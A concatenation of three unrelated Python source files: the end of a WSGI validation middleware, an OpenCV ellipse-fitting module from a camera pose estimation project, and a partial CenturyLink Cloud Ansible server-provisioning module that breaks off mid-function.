self.original_iterator.close()
def __del__(self):
if not self.closed:
sys.stderr.write(
"Iterator garbage collected without being closed")
assert self.closed, (
"Iterator garbage collected without being closed")
def check_environ(environ):
assert type(environ) is DictType, (
"Environment is not of the right type: %r (environment: %r)"
% (type(environ), environ))
for key in ['REQUEST_METHOD', 'SERVER_NAME', 'SERVER_PORT',
'wsgi.version', 'wsgi.input', 'wsgi.errors',
'wsgi.multithread', 'wsgi.multiprocess',
'wsgi.run_once']:
assert key in environ, (
"Environment missing required key: %r" % key)
for key in ['HTTP_CONTENT_TYPE', 'HTTP_CONTENT_LENGTH']:
assert key not in environ, (
"Environment should not have the key: %s "
"(use %s instead)" % (key, key[5:]))
if 'QUERY_STRING' not in environ:
warnings.warn(
'QUERY_STRING is not in the WSGI environment; the cgi '
'module will use sys.argv when this variable is missing, '
'so application errors are more likely',
WSGIWarning)
for key in environ.keys():
if '.' in key:
# Extension, we don't care about its type
continue
assert type(environ[key]) is StringType, (
"Environmental variable %s is not a string: %r (value: %r)"
% (key, type(environ[key]), environ[key]))
assert type(environ['wsgi.version']) is TupleType, (
"wsgi.version should be a tuple (%r)" % environ['wsgi.version'])
assert environ['wsgi.url_scheme'] in ('http', 'https'), (
"wsgi.url_scheme unknown: %r" % environ['wsgi.url_scheme'])
check_input(environ['wsgi.input'])
check_errors(environ['wsgi.errors'])
# @@: these need filling out:
if environ['REQUEST_METHOD'] not in (
'GET', 'HEAD', 'POST', 'OPTIONS','PUT','DELETE','TRACE'):
warnings.warn(
"Unknown REQUEST_METHOD: %r" % environ['REQUEST_METHOD'],
WSGIWarning)
assert (not environ.get('SCRIPT_NAME')
or environ['SCRIPT_NAME'].startswith('/')), (
"SCRIPT_NAME doesn't start with /: %r" % environ['SCRIPT_NAME'])
assert (not environ.get('PATH_INFO')
or environ['PATH_INFO'].startswith('/')), (
"PATH_INFO doesn't start with /: %r" % environ['PATH_INFO'])
if environ.get('CONTENT_LENGTH'):
assert int(environ['CONTENT_LENGTH']) >= 0, (
"Invalid CONTENT_LENGTH: %r" % environ['CONTENT_LENGTH'])
if not environ.get('SCRIPT_NAME'):
assert environ.has_key('PATH_INFO'), (
"One of SCRIPT_NAME or PATH_INFO are required (PATH_INFO "
"should at least be '/' if SCRIPT_NAME is empty)")
assert environ.get('SCRIPT_NAME') != '/', (
"SCRIPT_NAME cannot be '/'; it should instead be '', and "
"PATH_INFO should be '/'")
def check_input(wsgi_input):
for attr in ['read', 'readline', 'readlines', '__iter__']:
assert hasattr(wsgi_input, attr), (
"wsgi.input (%r) doesn't have the attribute %s"
% (wsgi_input, attr))
def check_errors(wsgi_errors):
for attr in ['flush', 'write', 'writelines']:
assert hasattr(wsgi_errors, attr), (
"wsgi.errors (%r) doesn't have the attribute %s"
% (wsgi_errors, attr))
def check_status(status):
assert type(status) is StringType, (
"Status must be a string (not %r)" % status)
# Implicitly check that we can turn it into an integer:
status_code = status.split(None, 1)[0]
assert len(status_code) == 3, (
"Status codes must be three characters: %r" % status_code)
status_int = int(status_code)
assert status_int >= 100, "Status code is invalid: %r" % status_int
if len(status) < 4 or status[3] != ' ':
warnings.warn(
"The status string (%r) should be a three-digit integer "
"followed by a single space and a status explanation"
% status, WSGIWarning)
def check_headers(headers):
assert type(headers) is ListType, (
"Headers (%r) must be of type list: %r"
% (headers, type(headers)))
header_names = {}
for item in headers:
assert type(item) is TupleType, (
"Individual headers (%r) must be of type tuple: %r"
% (item, type(item)))
assert len(item) == 2
name, value = item
assert name.lower() != 'status', (
"The Status header cannot be used; it conflicts with CGI "
"script, and HTTP status is not given through headers "
"(value: %r)." % value)
header_names[name.lower()] = None
assert '\n' not in name and ':' not in name, (
"Header names may not contain ':' or '\\n': %r" % name)
assert header_re.search(name), "Bad header name: %r" % name
assert not name.endswith('-') and not name.endswith('_'), (
"Names may not end in '-' or '_': %r" % name)
assert not bad_header_value_re.search(value), (
"Bad header value: %r (bad char: %r)"
% (value, bad_header_value_re.search(value).group(0)))
def check_content_type(status, headers):
code = int(status.split(None, 1)[0])
# @@: need one more person to verify this interpretation of RFC 2616
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
NO_MESSAGE_BODY = (201, 204, 304)
for name, value in headers:
if name.lower() == 'content-type':
if code not in NO_MESSAGE_BODY:
return
assert 0, (("Content-Type header found in a %s response, "
"which must not return content.") % code)
if code not in NO_MESSAGE_BODY:
assert 0, "No Content-Type header found in headers (%s)" % headers
def check_exc_info(exc_info):
assert exc_info is None or type(exc_info) is type(()), (
"exc_info (%r) is not a tuple: %r" % (exc_info, type(exc_info)))
# More exc_info checks?
def check_iterator(iterator):
# Technically a string is legal, which is why it's a really bad
# idea, because it may cause the response to be returned
# character-by-character
assert not isinstance(iterator, str), (
"You should not return a string as your application iterator, "
"instead return a single-item list containing that string.")
def make_middleware(application, global_conf):
# @@: global_conf should be taken out of the middleware function,
# and isolated here
return middleware(application)
make_middleware.__doc__ = __doc__
__all__ = ['middleware', 'make_middleware']
| |
#
# Milovision: A camera pose estimation programme
#
# Copyright (C) 2013 Joris Stork
# See LICENSE.txt
#
# ellipse.py
"""
:synopsis: Contains the EllipseFitter class, a PipelineModule used to fit
ellipses to the pipeline's sequences of contours.
.. moduleauthor:: Joris Stork <joris@wintermute.eu>
"""
import logging
import copy
import cv2
from pipeline_module import PipelineModule
import sys
import numpy as np
import math
class EllipseFitter(PipelineModule):
def __init__(self, pipeline = None):
"""
Sets ellipse filtering parameters and initialises accounting variables.
"""
PipelineModule.__init__(self, pipeline = pipeline)
self.nr_ellipses = 0.0
self.nr_candidates = 0
self.min_contour_length = 10
self.max_aspect_ratio = 10.
self.max_relative_inclination = 30.
self.max_ctrs_distance = 4.
# ratio ellipse sizes (outer/inner), (negative, positve) errors
self.max_sizes_ratio_error = [0.25,0.50]
def convert_representation(self, ellipses = None):
"""
Converts ellipse attributes to the pipeline's conventions regarding
units of measurement and the camera's coordinate basis.
"""
e = copy.deepcopy(ellipses)
for i, ellipse in enumerate(e):
((x_0, y_0), (b, a), alpha) = ellipse
x_0 -= self.pipe.outputs[-1].cam.ipw / 2.
x_0 *= self.pipe.outputs[-1].cam.pixelsize
y_0 = self.pipe.outputs[-1].cam.iph - y_0
y_0 -= self.pipe.outputs[-1].cam.iph / 2.
y_0 *= self.pipe.outputs[-1].cam.pixelsize
a *= self.pipe.outputs[-1].cam.pixelsize
b *= self.pipe.outputs[-1].cam.pixelsize
alpha = math.radians(alpha)
e[i] = ((x_0, y_0), (b, a), alpha)
return e
def ellipse_to_dict(self, ellipse):
""" converts the OpenCV ellipse representation to a dict """
temp = copy.deepcopy(ellipse)
ed = {}
ed['minor'], ed['major'] = temp[1][0], temp[1][1]
ed['ctr'] = np.asarray(temp[0])
ed['alpha'] = temp[2]
ed['object'] = ellipse
return ed
def larger_smaller(self, a, b):
""" returns a and b in the order: largest, smallest """
if b['major'] > a['major']:
return b, a
else:
return a, b
def aspect_ratio(self, e):
""" returns the aspect ratio of the given ellipse """
return abs(e['major'] / e['minor'])
def aspect_ratio_ok(self, e):
"""
Tests whether aspect ratio of the given ellipse is within a
pre-determined limit
"""
aspect_ratio = self.aspect_ratio(e)
return aspect_ratio <= self.max_aspect_ratio
def distance_ok(self, a, b):
"""
Tests whether the distance between the centres of the given ellipses is
within a pre-determined limit. nb: np.linalg.norm returns an absolute
value.
"""
return np.linalg.norm(a['ctr'] - b['ctr']) <= self.max_ctrs_distance
def relative_inclination_ok(self, a, b):
"""
Tests whether the difference between the inclinations of the two given
ellipses is within a pre-determined limit.
This is not used for near-circular ellipses.
"""
return abs(a['alpha'] - b['alpha']) < self.max_relative_inclination
def sizes_ratio_ok(self, larger = None, smaller = None):
"""
Tests whether ratio of sizes of given ellipses is within a
pre-determined range.
"""
outer = self.pipe.outputs[-1].markers[-1].config.outer_circle_diam * 1.
inner = self.pipe.outputs[-1].markers[-1].config.inner_circle_diam * 1.
correct_ratio = outer / inner
ratio = abs(larger['major'] / smaller['major'])
not_too_small = ratio > (correct_ratio - self.max_sizes_ratio_error[0])
not_too_big = ratio < (correct_ratio + self.max_sizes_ratio_error[1])
return not_too_small and not_too_big
def both_circular(self, a, b):
"""
Tests whether given ellipses have an aspect ratio smaller than a pre-determined limit.
"""
return (self.aspect_ratio(a) < 1.2) and (self.aspect_ratio(b) < 1.2)
def marker_filter(self, ellipses = None):
"""
Compares every ellipse (a) with every other (b), and returns those that
pass various tests relating to aspect ratio, sizes, location and
inclination.
"""
candidates = []
for i in xrange(len(ellipses)):
conditions = []
a = self.ellipse_to_dict(ellipses[i])
if not self.aspect_ratio_ok(a):
continue
for j in xrange(len(ellipses) - (i+1)):
conditions = []
b = self.ellipse_to_dict(ellipses[j+i+1])
larger, smaller = self.larger_smaller(a, b)
if not self.aspect_ratio_ok(b):
continue
if not self.distance_ok(a,b):
continue
if not self.both_circular(a,b):
if not self.relative_inclination_ok(a, b):
continue
if not self.sizes_ratio_ok(larger, smaller):
continue
if larger['object'] not in candidates:
candidates.append(larger['object'])
return candidates
def run(self):
"""
The main function. Rejects contours below a pre-determined length;
filters the remainder; converts the remaining ellipses to the pipeline's
representational convention; and draws these ellipses over the current
camera image in an OpenCV window before saving them to the pipeline.
"""
ellipses = []
if self.pipe.modules[0].__class__.__name__ == 'ContourFinder':
for cont in self.pipe.modules[0].conts:
if len(cont) < self.min_contour_length:
continue
ellipses.append(cv2.fitEllipse(cont))
self.nr_ellipses += len(ellipses)
else:
self.logger.error('no ContourFinder in pipeline')
self.pipe.shutdown()
candidates = self.marker_filter(ellipses)
self.nr_candidates += len(candidates)
converted_candidates = self.convert_representation(ellipses=candidates)
self.pipe.ellipses = []
for conv_candidate, candidate in zip(converted_candidates, candidates):
cv2.ellipse(
img = self.pipe.canv,
box = candidate,
color = (255,255,255),
thickness = 2,
lineType = cv2.CV_AA # antialiased
)
self.pipe.ellipses.append(conv_candidate)
| |
#!/usr/bin/python
#
# Copyright (c) 2015 CenturyLink
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: clc_server
short_description: Create, Delete, Start and Stop servers in CenturyLink Cloud.
description:
- An Ansible module to Create, Delete, Start and Stop servers in CenturyLink Cloud.
version_added: "2.0"
options:
additional_disks:
description:
- The list of additional disks for the server
required: False
default: []
add_public_ip:
description:
- Whether to add a public ip to the server
required: False
default: False
choices: [False, True]
alias:
description:
- The account alias to provision the servers under.
required: False
default: None
anti_affinity_policy_id:
description:
- The anti-affinity policy to assign to the server. This is mutually exclusive with 'anti_affinity_policy_name'.
required: False
default: None
anti_affinity_policy_name:
description:
- The anti-affinity policy to assign to the server. This is mutually exclusive with 'anti_affinity_policy_id'.
required: False
default: None
alert_policy_id:
description:
- The alert policy to assign to the server. This is mutually exclusive with 'alert_policy_name'.
required: False
default: None
alert_policy_name:
description:
- The alert policy to assign to the server. This is mutually exclusive with 'alert_policy_id'.
required: False
default: None
count:
description:
- The number of servers to build (mutually exclusive with exact_count)
required: False
default: 1
count_group:
description:
- Required when exact_count is specified. The Server Group use to determine how many severs to deploy.
required: False
default: None
cpu:
description:
- How many CPUs to provision on the server
default: 1
required: False
cpu_autoscale_policy_id:
description:
- The autoscale policy to assign to the server.
default: None
required: False
custom_fields:
description:
- The list of custom fields to set on the server.
default: []
required: False
description:
description:
- The description to set for the server.
default: None
required: False
exact_count:
description:
- Run in idempotent mode. Will insure that this exact number of servers are running in the provided group,
creating and deleting them to reach that count. Requires count_group to be set.
default: None
required: False
group:
description:
- The Server Group to create servers under.
default: 'Default Group'
required: False
ip_address:
description:
- The IP Address for the server. One is assigned if not provided.
default: None
required: False
location:
description:
- The Datacenter to create servers in.
default: None
required: False
managed_os:
description:
- Whether to create the server as 'Managed' or not.
default: False
required: False
choices: [True, False]
memory:
description:
- Memory in GB.
default: 1
required: False
name:
description:
- A 1 to 6 character identifier to use for the server. This is required when state is 'present'
default: None
required: False
network_id:
description:
- The network UUID on which to create servers.
default: None
required: False
packages:
description:
- The list of blue print packages to run on the server after its created.
default: []
required: False
password:
description:
- Password for the administrator / root user
default: None
required: False
primary_dns:
description:
- Primary DNS used by the server.
default: None
required: False
public_ip_protocol:
description:
- The protocol to use for the public ip if add_public_ip is set to True.
default: 'TCP'
choices: ['TCP', 'UDP', 'ICMP']
required: False
public_ip_ports:
description:
- A list of ports to allow on the firewall to the servers public ip, if add_public_ip is set to True.
default: []
required: False
secondary_dns:
description:
- Secondary DNS used by the server.
default: None
required: False
server_ids:
description:
- Required for started, stopped, and absent states.
A list of server Ids to insure are started, stopped, or absent.
default: []
required: False
source_server_password:
description:
- The password for the source server if a clone is specified.
default: None
required: False
state:
description:
- The state to insure that the provided resources are in.
default: 'present'
required: False
choices: ['present', 'absent', 'started', 'stopped']
storage_type:
description:
- The type of storage to attach to the server.
default: 'standard'
required: False
choices: ['standard', 'hyperscale']
template:
description:
- The template to use for server creation. Will search for a template if a partial string is provided.
This is required when state is 'present'
default: None
required: False
ttl:
description:
- The time to live for the server in seconds. The server will be deleted when this time expires.
default: None
required: False
type:
description:
- The type of server to create.
default: 'standard'
required: False
choices: ['standard', 'hyperscale', 'bareMetal']
configuration_id:
description:
- Only required for bare metal servers.
Specifies the identifier for the specific configuration type of bare metal server to deploy.
default: None
required: False
os_type:
description:
- Only required for bare metal servers.
Specifies the OS to provision with the bare metal server.
default: None
required: False
choices: ['redHat6_64Bit', 'centOS6_64Bit', 'windows2012R2Standard_64Bit', 'ubuntu14_64Bit']
wait:
description:
- Whether to wait for the provisioning tasks to finish before returning.
default: True
required: False
choices: [True, False]
requirements:
- python = 2.7
- requests >= 2.5.0
- clc-sdk
author: "CLC Runner (@clc-runner)"
notes:
- To use this module, it is required to set the below environment variables which enables access to the
Centurylink Cloud
- CLC_V2_API_USERNAME, the account login id for the centurylink cloud
- CLC_V2_API_PASSWORD, the account password for the centurylink cloud
- Alternatively, the module accepts the API token and account alias. The API token can be generated using the
CLC account login and password via the HTTP api call @ https://api.ctl.io/v2/authentication/login
- CLC_V2_API_TOKEN, the API token generated from https://api.ctl.io/v2/authentication/login
- CLC_ACCT_ALIAS, the account alias associated with the centurylink cloud
- Users can set CLC_V2_API_URL to specify an endpoint for pointing to a different CLC environment.
'''
EXAMPLES = '''
# Note - You must set the CLC_V2_API_USERNAME And CLC_V2_API_PASSWD Environment variables before running these examples
- name: Provision a single Ubuntu Server
clc_server:
name: test
template: ubuntu-14-64
count: 1
group: Default Group
state: present
- name: Ensure 'Default Group' has exactly 5 servers
clc_server:
name: test
template: ubuntu-14-64
exact_count: 5
count_group: Default Group
group: Default Group
- name: Stop a Server
clc_server:
server_ids:
- UC1ACCT-TEST01
state: stopped
- name: Start a Server
clc_server:
server_ids:
- UC1ACCT-TEST01
state: started
- name: Delete a Server
clc_server:
server_ids:
- UC1ACCT-TEST01
state: absent
'''
RETURN = '''
server_ids:
description: The list of server ids that are created
returned: success
type: list
sample:
[
"UC1TEST-SVR01",
"UC1TEST-SVR02"
]
partially_created_server_ids:
description: The list of server ids that are partially created
returned: success
type: list
sample:
[
"UC1TEST-SVR01",
"UC1TEST-SVR02"
]
servers:
description: The list of server objects returned from CLC
returned: success
type: list
sample:
[
{
"changeInfo":{
"createdBy":"service.wfad",
"createdDate":1438196820,
"modifiedBy":"service.wfad",
"modifiedDate":1438196820
},
"description":"test-server",
"details":{
"alertPolicies":[
],
"cpu":1,
"customFields":[
],
"diskCount":3,
"disks":[
{
"id":"0:0",
"partitionPaths":[
],
"sizeGB":1
},
{
"id":"0:1",
"partitionPaths":[
],
"sizeGB":2
},
{
"id":"0:2",
"partitionPaths":[
],
"sizeGB":14
}
],
"hostName":"",
"inMaintenanceMode":false,
"ipAddresses":[
{
"internal":"10.1.1.1"
}
],
"memoryGB":1,
"memoryMB":1024,
"partitions":[
],
"powerState":"started",
"snapshots":[
],
"storageGB":17
},
"groupId":"086ac1dfe0b6411989e8d1b77c4065f0",
"id":"test-server",
"ipaddress":"10.120.45.23",
"isTemplate":false,
"links":[
{
"href":"/v2/servers/wfad/test-server",
"id":"test-server",
"rel":"self",
"verbs":[
"GET",
"PATCH",
"DELETE"
]
},
{
"href":"/v2/groups/wfad/086ac1dfe0b6411989e8d1b77c4065f0",
"id":"086ac1dfe0b6411989e8d1b77c4065f0",
"rel":"group"
},
{
"href":"/v2/accounts/wfad",
"id":"wfad",
"rel":"account"
},
{
"href":"/v2/billing/wfad/serverPricing/test-server",
"rel":"billing"
},
{
"href":"/v2/servers/wfad/test-server/publicIPAddresses",
"rel":"publicIPAddresses",
"verbs":[
"POST"
]
},
{
"href":"/v2/servers/wfad/test-server/credentials",
"rel":"credentials"
},
{
"href":"/v2/servers/wfad/test-server/statistics",
"rel":"statistics"
},
{
"href":"/v2/servers/wfad/510ec21ae82d4dc89d28479753bf736a/upcomingScheduledActivities",
"rel":"upcomingScheduledActivities"
},
{
"href":"/v2/servers/wfad/510ec21ae82d4dc89d28479753bf736a/scheduledActivities",
"rel":"scheduledActivities",
"verbs":[
"GET",
"POST"
]
},
{
"href":"/v2/servers/wfad/test-server/capabilities",
"rel":"capabilities"
},
{
"href":"/v2/servers/wfad/test-server/alertPolicies",
"rel":"alertPolicyMappings",
"verbs":[
"POST"
]
},
{
"href":"/v2/servers/wfad/test-server/antiAffinityPolicy",
"rel":"antiAffinityPolicyMapping",
"verbs":[
"PUT",
"DELETE"
]
},
{
"href":"/v2/servers/wfad/test-server/cpuAutoscalePolicy",
"rel":"cpuAutoscalePolicyMapping",
"verbs":[
"PUT",
"DELETE"
]
}
],
"locationId":"UC1",
"name":"test-server",
"os":"ubuntu14_64Bit",
"osType":"Ubuntu 14 64-bit",
"status":"active",
"storageType":"standard",
"type":"standard"
}
]
'''
__version__ = '${version}'
import json
import os
import time
from distutils.version import LooseVersion
try:
import requests
except ImportError:
REQUESTS_FOUND = False
else:
REQUESTS_FOUND = True
#
# Requires the clc-python-sdk.
# sudo pip install clc-sdk
#
try:
import clc as clc_sdk
from clc import CLCException
from clc import APIFailedResponse
except ImportError:
CLC_FOUND = False
clc_sdk = None
else:
CLC_FOUND = True
from ansible.module_utils.basic import AnsibleModule
class ClcServer:
clc = clc_sdk
def __init__(self, module):
"""
Construct module
"""
self.clc = clc_sdk
self.module = module
self.group_dict = {}
if not CLC_FOUND:
self.module.fail_json(
msg='clc-python-sdk required for this module')
if not REQUESTS_FOUND:
self.module.fail_json(
msg='requests library is required for this module')
if requests.__version__ and LooseVersion(
requests.__version__) < LooseVersion('2.5.0'):
self.module.fail_json(
msg='requests library version should be >= 2.5.0')
self._set_user_agent(self.clc)
def process_request(self):
"""
Process the request - Main Code Path
:return: Returns with either an exit_json or fail_json
"""
changed = False
new_server_ids = []
server_dict_array = []
self._set_clc_credentials_from_env()
self.module.params = self._validate_module_params(
self.clc,
self.module)
p = self.module.params
state = p.get('state')
#
# Handle each state
#
partial_servers_ids = []
if state == 'absent':
server_ids = p['server_ids']
if not isinstance(server_ids, list):
return self.module.fail_json(
msg='server_ids needs to be a list of instances to delete: %s' %
server_ids)
(changed,
server_dict_array,
new_server_ids) = self._delete_servers(module=self.module,
clc=self.clc,
server_ids=server_ids)
elif state in ('started', 'stopped'):
server_ids = p.get('server_ids')
if not isinstance(server_ids, list):
return self.module.fail_json(
msg='server_ids needs to be a list of servers to run: %s' %
server_ids)
(changed,
server_dict_array,
new_server_ids) = self._start_stop_servers(self.module,
self.clc,
server_ids)
elif state == 'present':
# Changed is always set to true when provisioning new instances
if not p.get('template') and p.get('type') != 'bareMetal':
return self.module.fail_json(
msg='template parameter is required for new instance')
if p.get('exact_count') is None:
(server_dict_array,
new_server_ids,
partial_servers_ids,
changed) = self._create_servers(self.module,
self.clc)
else:
(server_dict_array,
new_server_ids,
partial_servers_ids,
changed) = self._enforce_count(self.module,
self.clc)
self.module.exit_json(
changed=changed,
server_ids=new_server_ids,
partially_created_server_ids=partial_servers_ids,
servers=server_dict_array)
@staticmethod
def _define_module_argument_spec():
"""
Define the argument spec for the ansible module
:return: argument spec dictionary
"""
argument_spec = dict(
name=dict(),
template=dict(),
group=dict(default='Default Group'),
network_id=dict(),
location=dict(default=None),
cpu=dict(default=1),
memory=dict(default=1),
alias=dict(default=None),
password=dict(default=None, no_log=True),
ip_address=dict(default=None),
storage_type=dict(
default='standard',
choices=[
'standard',
'hyperscale']),
type=dict(default='standard', choices=['standard', 'hyperscale', 'bareMetal']),
primary_dns=dict(default=None),
secondary_dns=dict(default=None),
additional_disks=dict(type='list', default=[]),
custom_fields=dict(type='list', default=[]),
ttl=dict(default=None),
managed_os=dict(type='bool', default=False),
description=dict(default=None),
source_server_password=dict(default=None, no_log=True),
cpu_autoscale_policy_id=dict(default=None),
anti_affinity_policy_id=dict(default=None),
anti_affinity_policy_name=dict(default=None),
alert_policy_id=dict(default=None),
alert_policy_name=dict(default=None),
packages=dict(type='list', default=[]),
state=dict(
default='present',
choices=[
'present',
'absent',
'started',
'stopped']),
count=dict(type='int', default=1),
exact_count=dict(type='int', default=None),
count_group=dict(),
server_ids=dict(type='list', default=[]),
add_public_ip=dict(type='bool', default=False),
public_ip_protocol=dict(
default='TCP',
choices=[
'TCP',
'UDP',
'ICMP']),
public_ip_ports=dict(type='list', default=[]),
configuration_id=dict(default=None),
os_type=dict(default=None,
choices=[
'redHat6_64Bit',
'centOS6_64Bit',
'windows2012R2Standard_64Bit',
'ubuntu14_64Bit'
]),
wait=dict(type='bool', default=True))
mutually_exclusive = [
['exact_count', 'count'],
['exact_count', 'state'],
['anti_affinity_policy_id', 'anti_affinity_policy_name'],
['alert_policy_id', 'alert_policy_name'],
]
return {"argument_spec": argument_spec,
"mutually_exclusive": mutually_exclusive}
def _set_clc_credentials_from_env(self):
"""
Set the CLC Credentials on the sdk by reading environment variables
:return: none
"""
env = os.environ
v2_api_token = env.get('CLC_V2_API_TOKEN', False)
v2_api_username = env.get('CLC_V2_API_USERNAME', False)
v2_api_passwd = env.get('CLC_V2_API_PASSWD', False)
clc_alias = env.get('CLC_ACCT_ALIAS', False)
api_url = env.get('CLC_V2_API_URL', False)
if api_url:
self.clc.defaults.ENDPOINT_URL_V2 = api_url
if v2_api_token and clc_alias:
self.clc._LOGIN_TOKEN_V2 = v2_api_token
self.clc._V2_ENABLED = True
self.clc.ALIAS = clc_alias
elif v2_api_username and v2_api_passwd:
self.clc.v2.SetCredentials(
api_username=v2_api_username,
api_passwd=v2_api_passwd)
else:
return self.module.fail_json(
msg="You must set the CLC_V2_API_USERNAME and CLC_V2_API_PASSWD "
"environment variables")
@staticmethod
def _validate_module_params(clc, module):
"""
Validate the module params, and lookup default values.
:param clc: clc-sdk instance to use
:param module: module to validate
:return: dictionary of validated params
"""
params = module.params
datacenter = ClcServer._find_datacenter(clc, module)
ClcServer._validate_types(module)
ClcServer._validate_name(module)
params['alias'] = ClcServer._find_alias(clc, module)
params['cpu'] = ClcServer._find_cpu(clc, module)
params['memory'] = ClcServer._find_memory(clc, module)
params['description'] = ClcServer._find_description(module)
params['ttl'] = ClcServer._find_ttl(clc, module)
params['template'] = ClcServer._find_template_id(module, datacenter)
params['group'] = ClcServer._find_group(module, datacenter).id
params['network_id'] = ClcServer._find_network_id(module, datacenter)
params['anti_affinity_policy_id'] = ClcServer._find_aa_policy_id(
clc,
module)
params['alert_policy_id'] = ClcServer._find_alert_policy_id(
clc,
module)
return params
@staticmethod
def _find_datacenter(clc, module):
"""
Find the datacenter by calling the CLC API.
:param clc: clc-sdk instance to use
:param module: module to validate
:return: clc-sdk.Datacenter instance
"""
location = module.params.get('location')
try:
if not location:
account = clc.v2.Account()
location = account.data.get('primaryDataCenter')
data_center = clc.v2.Datacenter(location)
return data_center
except CLCException:
module.fail_json(msg="Unable to find location: {0}".format(location))
@staticmethod
def _find_alias(clc, module):
"""
Find or Validate the Account Alias by calling the CLC API
:param clc: clc-sdk instance to use
:param module: module to validate
:return: clc-sdk.Account instance
"""
alias = module.params.get('alias')
if not alias:
try:
alias = clc.v2.Account.GetAlias()
except CLCException as ex:
module.fail_json(msg='Unable to find account alias. {0}'.format(
ex.message
))
return alias
@staticmethod
def _find_cpu(clc, module):
"""
Find or validate the CPU value by calling the CLC API
:param clc: clc-sdk instance to use
:param module: module to validate
:return: Int value for CPU
"""
cpu = module.params.get('cpu')
group_id = module.params.get('group_id')
alias = module.params.get('alias')
state = module.params.get('state')
if not cpu and state == 'present':
group = clc.v2.Group(id=group_id,
alias=alias)
if group.Defaults("cpu"):
cpu = group.Defaults("cpu")
else:
module.fail_json(
msg=str("Can\'t determine a default cpu value. Please provide a value for cpu."))
return cpu
@staticmethod
def _find_memory(clc, module):
"""
Find or validate the Memory value by calling the CLC API
:param clc: clc-sdk instance to use
:param module: module to validate
:return: Int value for Memory
"""
memory = module.params.get('memory')
group_id = module.params.get('group_id')
alias = module.params.get('alias')
state = module.params.get('state')
if not memory and state == 'present':
group = clc.v2.Group(id=group_id,
alias=alias)
if group.Defaults("memory"):
memory = group.Defaults("memory")
else:
module.fail_json(msg=str(
"Can\'t determine a default memory value. Please provide a value for memory."))
return memory
@staticmethod
def _find_description(module):
"""
Set the description module param to name if description is blank
:param module: the module to validate
:return: string description
"""
description = module.params.get('description')
if not description:
description = module.params.get('name')
return description
@staticmethod
def _validate_types(module):
"""
Validate that type and storage_type are set appropriately, and fail if not
:param module: the module to validate
:return: none
"""
state = module.params.get('state')
server_type = module.params.get(
'type').lower() if module.params.get('type') else None
storage_type = module.params.get(
'storage_type').lower() if module.params.get('storage_type') else None
if state == "present":
if server_type == "standard" and storage_type not in (
"standard", "premium"):
module.fail_json(
msg=str("Standard VMs must have storage_type = 'standard' or 'premium'"))
if server_type == "hyperscale" and storage_type != "hyperscale":
module.fail_json(
msg=str("Hyperscale VMs must have storage_type = 'hyperscale'"))
@staticmethod
def _validate_name(module):
"""
Validate that name is the correct length if provided, fail if it's not
:param module: the module to validate
:return: none
"""
server_name = module.params.get('name')
state = module.params.get('state')
if state == 'present' and (
len(server_name) < 1 or len(server_name) > 6):
module.fail_json(msg=str(
"When state = 'present', name must be a string with a minimum length of 1 and a maximum length of 6"))
@staticmethod
def _find_ttl(clc, module):
"""
Validate that TTL is > 3600 if set, and fail if not
:param clc: clc-sdk instance to use
:param module: module to validate
:return: validated ttl
"""
ttl = module.params.get('ttl')
if ttl:
if ttl <= 3600:
return module.fail_json(msg=str("Ttl cannot be <= 3600"))
else:
ttl = clc.v2.time_utils.SecondsToZuluTS(int(time.time()) + ttl)
return ttl
@staticmethod
def _find_template_id(module, datacenter):
"""
Find the template id by calling the CLC API.
:param module: the module to validate
:param datacenter: the datacenter to search for the template
:return: a valid clc template id
"""
lookup_template = module.params.get('template')
state = module.params.get('state')
type = module.params.get('type')
result = None
if state == 'present' and type != 'bareMetal':
try:
result = datacenter.Templates().Search(lookup_template)[0].id
except CLCException:
module.fail_json(
msg=str(
"Unable to find a template: " +
lookup_template +
" in location: " +
datacenter.id))
return result
@staticmethod
def _find_network_id(module, datacenter):
"""
Validate the provided network id or return a default.
:param module: the module to validate
:param datacenter: the datacenter to search for a network id
:return: a valid network id
"""
network_id = module.params.get('network_id')
if not network_id:
try:
network_id = datacenter.Networks().networks[0].id
# -- added for clc-sdk 2.23 compatibility
# datacenter_networks = clc_sdk.v2.Networks(
# networks_lst=datacenter._DeploymentCapabilities()['deployableNetworks'])
# network_id = datacenter_networks.networks[0].id
# -- end
except CLCException:
module.fail_json(
msg=str(
"Unable to find a network in location: " +
datacenter.id))
return network_id
@staticmethod
def _find_aa_policy_id(clc, module):
"""
Validate if the anti affinity policy exist for the given name and throw error if not
:param clc: the clc-sdk instance
:param module: the module to validate
:return: aa_policy_id: the anti affinity policy id of the given name.
"""
aa_policy_id = module.params.get('anti_affinity_policy_id')
aa_policy_name = module.params.get('anti_affinity_policy_name')
if not aa_policy_id and aa_policy_name:
alias = module.params.get('alias')
aa_policy_id = ClcServer._get_anti_affinity_policy_id(
clc,
module,
alias,
aa_policy_name)
if not aa_policy_id:
module.fail_json(
msg='No anti affinity policy was found with policy name : %s' % aa_policy_name)
return aa_policy_id
@staticmethod
def _find_alert_policy_id(clc, module):
"""
Validate if the alert policy exist for the given name and throw error if not
:param clc: the clc-sdk instance
:param module: the module to validate
:return: alert_policy_id: the alert policy id of the given name.
"""
alert_policy_id = module.params.get('alert_policy_id')
alert_policy_name = module.params.get('alert_policy_name')
if not alert_policy_id and alert_policy_name:
alias = module.params.get('alias')
alert_policy_id = ClcServer._get_alert_policy_id_by_name(
clc=clc,
module=module,
alias=alias,
alert_policy_name=alert_policy_name
)
if not alert_policy_id:
module.fail_json(
msg='No alert policy exist with name : %s' % alert_policy_name)
return alert_policy_id
def _create_servers(self, module, clc, override_count=None):
"""
Create New Servers in CLC cloud
:param module: the AnsibleModule object
:param clc: the clc-sdk instance to use
:return: a list of dictionaries with server information about the servers that were created
"""
p = module.params
request_list = []
servers = []
server_dict_array = []
created_server_ids = []
partial_created_servers_ids = []
add_public_ip = p.get('add_public_ip')
public_ip_protocol = p.get('public_ip_protocol')
public_ip_ports = p.get('public_ip_ports')
params = {
'name': p.get('name'),
'template': p.get('template'),
'group_id': p.get('group'),
'network_id': p.get('network_id'),
'cpu': p.get('cpu'),
'memory': p.get('memory'),
'alias': p.get('alias'),
'password': p.get('password'),
'ip_address': p.get('ip_address'),
'storage_type': p.get('storage_type'),
'type': p.get('type'),
'primary_dns': p.get('primary_dns'),
'secondary_dns': p.get('secondary_dns'),
'additional_disks': p.get('additional_disks'),
